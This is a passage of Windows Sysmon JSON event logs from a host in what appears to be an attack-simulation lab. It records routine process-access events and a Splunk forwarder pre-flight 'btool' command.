C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2007,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2008,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2009,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2010,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2011,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-00100FE80300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-00100FE80300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2012,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.943\r\nSourceProcessGUID: {E2A3D6B1-106E-5F25-0000-00100FE80300}\r\nSourceProcessId: 4036\r\nSourceThreadId: 4032\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.943","SourceProcessGUID":"{E2A3D6B1-106E-5F25-0000-00100FE80300}","SourceProcessId":"4036","SourceThreadId":"4032","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2013,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-00100FE80300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-00100FE80300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2014,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.038\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-001062EB0300}\r\nProcessId: 3952\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nParentProcessId: 3896\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.038","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-001062EB0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-001067C70300}","ParentProcessId":"3896","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program 